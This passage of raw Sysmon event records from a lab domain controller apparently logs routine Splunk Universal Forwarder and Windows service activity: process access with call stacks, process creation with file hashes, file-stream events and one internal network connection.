Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E6B6-6040-E64D-00000000AD01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6B6-6040-E64D-00000000AD01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-E6B6-6040-E64D-00000000AD01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.067{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C3A7EF438A6B660FBA0198EE0EEB0F,SHA256=8DF1D3123AE5547EA24B49EB1F833D7E1945D852B130BFD5DF6310B3659C4D55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.742{5ABCFE62-E6B7-6040-E84D-00000000AD01}59526224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6B7-6040-E84D-00000000AD01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E6B7-6040-E84D-00000000AD01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.613{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6B7-6040-E84D-00000000AD01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.615{5ABCFE62-E6B7-6040-E84D-00000000AD01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.332{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A921FEBAB1FFF9F2681B2E18DA1D08F,SHA256=65A3518CC27EDF5854A4AF209877BAEE000F60DECD7157070C39A1D1B67DFF96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:03.129{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84520247A4E4D88ECDF767C73C36AB5,SHA256=FB3B0B994D6B004956DF575107C51AC33E9683240FA1BD232EA56BBD4262F242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:04.617{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8795D6549E6260E198522C2C3B6713B6,SHA256=9E3EA57381AC575B3AB4E079D2A753FCCE3A664217CE999F0A702DD697E4721A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:04.367{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:04.132{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ECC8708C4A59D6E322AE266A243DF4B,SHA256=C307CC583853049E83B71E7EE9B3845ECD96901411A9E012D06A92319CFA6199,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200707Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:01.907{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55151-false10.0.1.12-8000- 23542300x80000000000000002200706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:05.257{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAEC4DDC221F6C664B225565686B872E,SHA256=C1140DBD516DF4B722CF12AA9FE07EA525B31FC26722C259004F3633E057011D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200709Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:06.726{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200708Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:06.273{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE98EE48502C1B97BC0B50B3173E223,SHA256=177AD9FEEA5D86B27BA8AADF2F4171AF66C5E1AC04EDB8271275899D1F1395FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200711Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:07.757{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5E5340EC07E17C575278764B439B35E,SHA256=30B73F24CFE21C4ADE6F6904E46593EF0F0CFB4EFADC841188B1FA1DC12301B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200710Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:07.288{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A71410D1EE6240A351A09616BF549B6E,SHA256=AD51BCD1EA78FC0D1006F66F08777BF6390D39E1F21C2D1624C7B2DB3EEB6547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200712Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:08.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F5B9A687275C3DD7014589E0441BA55,SHA256=52C453384C9CAD3F07A58505EC02F0C28B240877826A7AD31CF40A4C75FE738D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200747Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.538{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649EED58EB1222975FD89055044B4120,SHA256=8E02496F51B22ABD6D0B08429BCCCC9D48975300F975C74F3FF128378EA85717,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200746Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200745Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200744Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200743Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200742Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 